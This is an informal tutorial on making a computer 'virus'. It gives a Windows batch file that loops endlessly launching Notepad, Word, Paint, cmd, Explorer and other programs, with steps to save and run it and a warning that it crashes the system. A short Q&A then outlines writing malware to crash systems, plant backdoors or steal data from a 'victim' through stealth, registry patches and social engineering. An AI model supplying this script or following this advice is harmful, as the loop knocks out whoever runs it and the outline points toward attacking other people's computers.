1. open a notepad.
2. write:
@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop
3. save as anyname.bat.
Run the Batch file...
N.B: TO AVOID SYSTEM CRASH DELETE THE LOOP.
how can i create virus
A computer virus is a computer program that can copy itself and infect a computer.
First u have to think how would u infect the victim...
Like crash the system or malfunction a program or create a back door or steal data...
Then u need to develop the algorithm...
Like the main logic development, registry patch, stealth mode etc...
Last the coding...
U can code in C, C++, Java Script, VB etc...
But the ultimate requirement is Social Engineering...